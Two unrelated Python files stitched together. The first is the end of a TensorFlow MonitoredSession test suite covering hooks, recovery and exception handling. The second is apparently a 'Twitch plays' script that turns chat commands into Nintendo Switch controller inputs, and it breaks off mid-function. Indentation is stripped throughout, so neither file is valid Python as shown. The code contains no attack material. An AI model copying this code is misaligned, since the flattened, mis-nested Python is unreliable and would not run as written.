sess.run(variables.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor)
def testHooksAndUserFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(session_run_hook.SessionRunHook):
"""Hook that raises an Exception at step N."""
def __init__(self, n, ex):
self.n = n
self.ex = ex
self.raised = False
def before_run(self, run_context):
# Raise the first time we reach step N.
self.n -= 1
if 0 == self.n and not self.raised:
self.raised = True
raise self.ex
return None
class RunOptionsMetadataHook(session_run_hook.SessionRunHook):
"""A hook that observes & optionally modifies RunOptions and RunMetadata."""
def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
debug_tensor_watch):
self._trace_level = trace_level
self._timeout_in_ms = timeout_in_ms
self._output_partition_graphs = output_partition_graphs
self._debug_tensor_watch = debug_tensor_watch
self.run_options_list = []
self.run_metadata_list = []
def before_run(self, run_context):
options = config_pb2.RunOptions(
trace_level=self._trace_level,
timeout_in_ms=self._timeout_in_ms,
output_partition_graphs=self._output_partition_graphs)
options.debug_options.debug_tensor_watch_opts.extend(
[self._debug_tensor_watch])
return session_run_hook.SessionRunArgs(None, None, options=options)
def after_run(self, run_context, run_values):
self.run_options_list.append(run_values.options)
self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
with ops.Graph().as_default():
a_var = variables.Variable(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
def test_last_step(self):
logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Run till step 3 and save.
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=3)]
scaffold = monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession(hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(3, session.run(do_step))
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Run till step 5 and save.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=5)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(3, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(5, session.run(do_step))
self.assertTrue(session.should_stop())
def test_num_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Do 3 steps and save.
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=3)]
scaffold = monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession(hooks=hooks) as session:
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Restore and do 4 steps.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=4)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
  # This set of tests verifies the supervised session behavior when exceptions
# are raised next to the innermost session run() call.
def test_recovery(self):
logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
# Use a hook to save the model every 100 steps. It also saves it at
# the end.
hooks = [
basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir)) as session:
self.assertEqual(2, session.run(gstep))
def test_retry_on_aborted_error(self):
# Tests that we silently retry on abort. Note that this does not test
# recovery as we do not use a CheckpointSaver in this test.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, errors_impl.AbortedError(None, None, 'Abort'))
with monitored_session.MonitoredSession(hooks=[hook]) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
        # MonitoredSession automatically retries and restarts from a freshly
# initialized session, so the step is back to 0 and running do_step
# moves it to 1.
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertTrue(hook.raised)
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
def test_recover_and_retry_on_aborted_error(self):
# Tests that we silently retry and recover on abort. This test uses
# a CheckpointSaver to have something to recover from.
logdir = _test_dir(self.get_temp_dir(),
'test_recover_and_retry_on_aborted_error')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
abort_hook = RaiseOnceAtCountN(
4, errors_impl.AbortedError(None, None, 'Abort'))
# Save after each step.
ckpt_hook = basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
hooks = [abort_hook, ckpt_hook]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically restores and retries.
self.assertEqual(3, session.run(do_step))
self.assertTrue(abort_hook.raised)
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
    # Tests that we stop cleanly when StopIteration is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, StopIteration)
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises StopIteration. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
# Tests that regular exceptions just pass through a "with
# MonitoredSession" block and set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
session = monitored_session.MonitoredSession(hooks=[hook])
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# This triggers the hook and raises the exception
session.run(do_step)
# We should not hit this
self.assertFalse(True)
self.assertTrue(hook.raised)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.MonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
# Tests that regular exceptions reported to the coordinator from a thread
    # pass through returning from a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.MonitoredSession()
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
self.assertTrue(session.should_stop())
  # This set of tests verifies the session behavior when exceptions are raised
# from code inside a "with MonitoredSession:" context.
def test_stop_cleanly_when_no_exception_in_with_body(self):
    # Tests that the session stops and closes cleanly when the with-body exits without raising.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
# Tests that regular exceptions in "with body" are seen outside.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
# We should see that exception.
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Will be visible outside the "with body".
raise RuntimeError('regular exception')
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.MonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_graph_finalized_during_run_unfinalized_after_exit(self):
with ops.Graph().as_default() as g:
a_var = variables.Variable(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertFalse(g.finalized)
def test_keep_finalized_graph_as_finalized(self):
with ops.Graph().as_default() as g:
a_var = variables.Variable(0)
monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertTrue(g.finalized)
def test_merge_run_options_from_hooks(self):
"""Test for rewriting RunOptions and observing RunMetadata with hooks."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
watch_a = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a)
watch_b = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b)
with monitored_session.MonitoredSession(
hooks=[hook_a, hook_b]) as session:
self.assertEqual(42, session.run(my_const))
# trace_level=3 should have overridden trace_level=2;
# timeout_in_ms=60000 should have overridden 30000;
# output_partition_graphs=True should have overridden False.
# The two debug tensor watches should have been merged.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[watch_a, watch_b]))
],
hook_b.run_options_list)
self.assertEqual(1, len(hook_b.run_metadata_list))
self.assertTrue(
isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
"""Test that RunOptions from caller and hooks can be merged properly."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
hook_watch = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook = RunOptionsMetadataHook(2, 60000, False, hook_watch)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
caller_watch = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
caller_options = config_pb2.RunOptions(
trace_level=3, timeout_in_ms=30000, output_partition_graphs=True)
caller_options.debug_options.debug_tensor_watch_opts.extend(
[caller_watch])
self.assertEqual(42, session.run(my_const, options=caller_options))
# trace_level=3 from the caller should override 2 from the hook.
# timeout_in_ms=60000 from the hook should override from the caller.
# output_partition_graph=True from the caller should override False
# from the hook.
# The two debug watches from the caller and the hook should be merged,
# in that order.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[caller_watch, hook_watch]))
],
hook.run_options_list)
self.assertEqual(1, len(hook.run_metadata_list))
self.assertTrue(
isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
class SingularMonitoredSessionTest(test.TestCase):
"""Tests SingularMonitoredSession."""
def test_handles_initialization(self):
with ops.Graph().as_default():
a_var = variables.Variable(0)
with monitored_session.SingularMonitoredSession() as session:
        # If it's not initialized, the following statement raises an error.
self.assertEqual(0, session.run(a_var))
def test_do_not_handle_aborted_error(self):
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
class _RaiseAbortedHook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
with self.assertRaises(errors_impl.AbortedError):
self.assertEqual(0, session.run(gstep))
with self.assertRaises(errors_impl.AbortedError):
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
self.assertEqual(0, session.run(gstep))
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.SingularMonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.SingularMonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that the session stops cleanly when the with-body raises no exception.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.SingularMonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertEqual(None, session.raw_session())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.SingularMonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_raw_session(self):
with ops.Graph().as_default():
with monitored_session.SingularMonitoredSession() as session:
self.assertTrue(isinstance(session.raw_session(), session_lib.Session))
if __name__ == '__main__':
test.main()
|
main.py
|
#!/usr/bin/python3
import re
import socket
import sqlite3
import asyncore
import os
from os.path import isfile
from json import load, dump
from time import sleep, time
from threading import Thread, Timer
#external libraries
from lib.switch_controller import *
TWITCH_HOST = "irc.chat.twitch.tv"
TWITCH_PORT = 6667
SERIAL_DEVICE = "COM5"
SERIAL_BAUD = 9600
MAX_COMMANDS_PER_MESSAGE = 8
CONFIG_FILE = "config.json"
DATABASE_FILE = "data.db"
#game mode
GAME_MODE = MODE_BACK_VIEW
#button shortcuts
JUMP_BUTTON = BUTTON_X
#last command timestamp
LAST_COMMAND = None
#keep-alive threshold in seconds
KEEP_ALIVE_DIFFERENTIAL = 60
#1 = username
#2 = command
#3 = channel
#4 = message
CHAT_EXP = re.compile(r"^:([\w\W]{0,}?)![\w\W]{0,}?@[\w\W]{0,}?\.tmi\.twitch\.tv\s([A-Z]{0,}?)\s#([\w\W]{0,}?)\s:([\w\W]{0,}?)$")
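#illustrative example (not from the original source): a raw IRC line such as
#  ":someuser!someuser@someuser.tmi.twitch.tv PRIVMSG #somechannel :a, up"
#yields the groups ("someuser", "PRIVMSG", "somechannel", "a, up")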
CURRENT_THREAD = None
def prevent_timeout():
Timer(KEEP_ALIVE_DIFFERENTIAL, keep_alive).start()
def keep_alive():
global LAST_COMMAND
global CURRENT_THREAD
#compute difference in current timestamp and last command
if isinstance(CURRENT_THREAD, Thread) and not CURRENT_THREAD.is_alive() and isinstance(LAST_COMMAND, int) and (timestamp() - LAST_COMMAND) >= KEEP_ALIVE_DIFFERENTIAL:
print('CommunityController used an awakening!')
controller.push_dpad(DPAD_LEFT)
prevent_timeout()
def timestamp():
return int(time())  # 'time' is imported as a function above, so call it directly
def create_database() -> None:
"""
A, B, X, Y, L, R, ZL, ZR, up, down, left, right, left joystick, right joystick, select
"""
with sqlite3.connect(DATABASE_FILE) as db:
c = db.cursor()
c.execute("CREATE TABLE IF NOT EXISTS buttons (name TEXT PRIMARY KEY, presses INT)")
for button_name in [
"A", "B", "X", "Y", #ABXY
"L", "R", "ZL", "ZR", #bumpers and triggers
"LCLICK", "RCLICK", #L3 and R3
"UP", "DOWN", "LEFT", "RIGHT", #D-Pad
"LX MIN", "LX MAX", "LY MIN", "LY MAX", #left analog stick
"RX MIN", "RX MAX", "RY MIN", "RY MAX", #right analog stick
"START", "SELECT", #start and select
"CAPTURE" #capture button
]:
c.execute("INSERT INTO buttons (name, presses) VALUES ('" + button_name + "', 0)")
db.commit()
def increment_button_count(name: str) -> None:
with sqlite3.connect(DATABASE_FILE) as db:
c = db.cursor()
c.execute("SELECT * FROM buttons WHERE name=:name", {"name": name})
button = c.fetchone()
c.execute("UPDATE buttons SET presses=:presses WHERE name=:name", {"presses": button[1] + 1, "name": name})
db.commit()
def execute_command(message: str) -> None:
#db = sqlite3.connect("data.db")
message = message.strip().upper()
split_message = message.split(",")
command_executed = False
if len(split_message) <= MAX_COMMANDS_PER_MESSAGE:
for single in split_message:
single = single.strip().replace(" ", "_")
# A, B, X, and Y
if single in ["A", "B", "X", "Y"]:
increment_button_count(single)
if single == "A":
controller.push_button(BUTTON_A)
elif single == "B":
controller.push_button(BUTTON_B)
elif single == "X":
controller.push_button(BUTTON_X)
elif single == "Y":
controller.push_button(BUTTON_Y)
command_executed = True
# LB, LT, RB, and RT
elif single in ["L", "LB"]:
increment_button_count("L")
controller.push_button(BUTTON_L)
command_executed = True
elif single in ["R", "RB"]:
increment_button_count("R")
controller.push_button(BUTTON_R)
command_executed = True
elif single in ["LT", "ZL"]:
increment_button_count("ZL")
controller.push_button(BUTTON_ZL)
command_executed = True
elif single in ["RT", "ZR"]:
increment_button_count("ZR")
controller.push_button(BUTTON_ZR)
command_executed = True
#L3 and R3
elif single in ["LCLICK", "L3"]:
increment_button_count("LCLICK")
controller.push_button(BUTTON_LCLICK)
command_executed = True
elif single in ["RCLICK", "R3"]:
increment_button_count("RCLICK")
controller.push_button(BUTTON_RCLICK)
command_executed = True
# start and select
elif single in ["START", "SELECT", "PLUS", "+", "MINUS", "-"]:
if single in ["START", "PLUS", "+"]:
increment_button_count("START")
controller.push_button(BUTTON_PLUS)
if single in ["SELECT", "MINUS", "-"]:
increment_button_count("SELECT")
controller.push_button(BUTTON_MINUS)
command_executed = True
elif single in ["UP", "DOWN", "LEFT", "RIGHT"]: # D-Pad
if single == "UP":
increment_button_count("UP")
controller.push_dpad(DPAD_UP)
elif single == "DOWN":
increment_button_count("DOWN")
controller.push_dpad(DPAD_DOWN)
elif single == "LEFT":
increment_button_count("LEFT")
controller.push_dpad(DPAD_LEFT)
elif single == "RIGHT":
increment_button_count("RIGHT")
controller.push_dpad(DPAD_RIGHT)
command_executed = True
elif single in ["MOVE_FORWARD", "MOVE_BACK", "MOVE_LEFT", "MOVE_RIGHT"]: # left stick
if single == "MOVE_FORWARD":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(1.0)
controller.release_left_stick()
elif single == "MOVE_BACK":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(1.0)
controller.release_left_stick()
elif single == "MOVE_LEFT":
increment_button_count("LX MIN")
controller.move_left()
sleep(1.0)
controller.release_left_stick()
elif single == "MOVE_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
sleep(1.0)
controller.release_left_stick()
command_executed = True
elif single in ["LOOK_UP", "LOOK_DOWN", "LOOK_LEFT", "LOOK_RIGHT"]: # right stick
if single == "LOOK_UP":
increment_button_count("RY MIN")
controller.look_up()
sleep(0.5)
controller.release_right_stick()
elif single == "LOOK_DOWN":
increment_button_count("RY MAX")
controller.look_down()
sleep(0.5)
controller.release_right_stick()
elif single == "LOOK_LEFT":
increment_button_count("RX MIN")
controller.look_left()
sleep(0.5)
controller.release_right_stick()
elif single == "LOOK_RIGHT":
increment_button_count("RX MAX")
controller.look_right()
sleep(0.5)
controller.release_right_stick()
command_executed = True
#commands for holding down each face button for 1 second
elif single in ["HOLD_A", "HOLD_B", "HOLD_X", "HOLD_Y"]:
if single == "HOLD_A":
increment_button_count("A")
controller.hold_buttons(BUTTON_A)
sleep(1.0)
controller.release_buttons(BUTTON_A)
elif single == "HOLD_B":
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
elif single == "HOLD_X":
increment_button_count("X")
controller.hold_buttons(BUTTON_X)
sleep(1.0)
controller.release_buttons(BUTTON_X)
elif single == "HOLD_Y":
increment_button_count("Y")
controller.hold_buttons(BUTTON_Y)
sleep(1.0)
controller.release_buttons(BUTTON_Y)
command_executed = True
elif single in ["HOLD_L", "HOLD_LB", "HOLD_R", "HOLD_RB", "HOLD_ZL", "HOLD_LT", "HOLD_ZR", "HOLD_RT", "HOLD_LCLICK", "HOLD_L3", "HOLD_RCLICK", "HOLD_R3"]:
if single in ["HOLD_L", "HOLD_LB"]:
increment_button_count("L")
controller.hold_buttons(BUTTON_L)
sleep(1.0)
controller.release_buttons(BUTTON_L)
elif single in ["HOLD_R", "HOLD_RB"]:
increment_button_count("R")
controller.hold_buttons(BUTTON_R)
sleep(1.0)
controller.release_buttons(BUTTON_R)
elif single in ["HOLD_ZL", "HOLD_LT"]:
increment_button_count("ZL")
controller.hold_buttons(BUTTON_ZL)
sleep(1.0)
controller.release_buttons(BUTTON_ZL)
elif single in ["HOLD_ZR", "HOLD_RT"]:
increment_button_count("ZR")
controller.hold_buttons(BUTTON_ZR)
sleep(1.0)
controller.release_buttons(BUTTON_ZR)
elif single in ["HOLD_LCLICK", "HOLD_L3"]:
increment_button_count("LCLICK")
controller.hold_buttons(BUTTON_LCLICK)
sleep(1.0)
controller.release_buttons(BUTTON_LCLICK)
elif single in ["HOLD_RCLICK", "HOLD_R3"]:
increment_button_count("RCLICK")
controller.hold_buttons(BUTTON_RCLICK)
sleep(1.0)
controller.release_buttons(BUTTON_RCLICK)
command_executed = True
elif single in ["HOLD_UP", "HOLD_DOWN", "HOLD_LEFT", "HOLD_RIGHT"]:
if single == "HOLD_UP":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(1.0)
controller.release_dpad()
elif single == "HOLD_DOWN":
increment_button_count("DOWN")
controller.hold_dpad(DPAD_DOWN)
sleep(1.0)
controller.release_dpad()
elif single == "HOLD_LEFT":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(1.0)
controller.release_dpad()
elif single == "HOLD_RIGHT":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(1.0)
controller.release_dpad()
command_executed = True
elif single in ["PRESS_UP", "PRESS_DOWN", "PRESS_LEFT", "PRESS_RIGHT"]:
if single == "PRESS_UP":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(0.5)
controller.release_dpad()
elif single == "PRESS_DOWN":
increment_button_count("DOWN")
controller.hold_dpad(DPAD_DOWN)
sleep(0.5)
controller.release_dpad()
elif single == "PRESS_LEFT":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
controller.release_dpad()
elif single == "PRESS_RIGHT":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single in ["ADJUST_BACKWARD", "ADJUST_BACK", "ADJUST_FORWARD", "ADJUST_LEFT", "ADJUST_RIGHT"]:
if single == "ADJUST_BACKWARD":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.3)
controller.release_left_stick()
elif single == "ADJUST_BACK":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.3)
controller.release_left_stick()
elif single == "ADJUST_FORWARD":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.3)
controller.release_left_stick()
elif single == "ADJUST_LEFT":
increment_button_count("LX MIN")
controller.move_left()
sleep(0.3)
controller.release_left_stick()
elif single == "ADJUST_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
sleep(0.3)
controller.release_left_stick()
command_executed = True
elif single in ["GLANCE_UP", "GLANCE_DOWN", "GLANCE_LEFT", "GLANCE_RIGHT"]:
if single == "GLANCE_UP":
increment_button_count("RY MIN")
controller.look_up()
sleep(0.125)
controller.release_right_stick()
elif single == "GLANCE_DOWN":
increment_button_count("RY MAX")
controller.look_down()
sleep(0.125)
controller.release_right_stick()
elif single == "GLANCE_LEFT":
increment_button_count("RX MIN")
controller.look_left()
sleep(0.125)
controller.release_right_stick()
elif single == "GLANCE_RIGHT":
increment_button_count("RX MAX")
controller.look_right()
sleep(0.125)
controller.release_right_stick()
command_executed = True
#hold until manual release
elif single in ["KEEP_HOLD_A", "KEEP_HOLD_B", "KEEP_HOLD_X", "KEEP_HOLD_Y"]:
if single == "KEEP_HOLD_A":
increment_button_count("A")
controller.hold_buttons(BUTTON_A)
elif single == "KEEP_HOLD_B":
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
elif single == "KEEP_HOLD_X":
increment_button_count("X")
controller.hold_buttons(BUTTON_X)
elif single == "KEEP_HOLD_Y":
increment_button_count("Y")
controller.hold_buttons(BUTTON_Y)
command_executed = True
elif single in ["RELEASE_A", "RELEASE_B", "RELEASE_X", "RELEASE_Y"]:
if single == "RELEASE_A":
controller.release_buttons(BUTTON_A)
elif single == "RELEASE_B":
controller.release_buttons(BUTTON_B)
elif single == "RELEASE_X":
controller.release_buttons(BUTTON_X)
elif single == "RELEASE_Y":
controller.release_buttons(BUTTON_Y)
command_executed = True
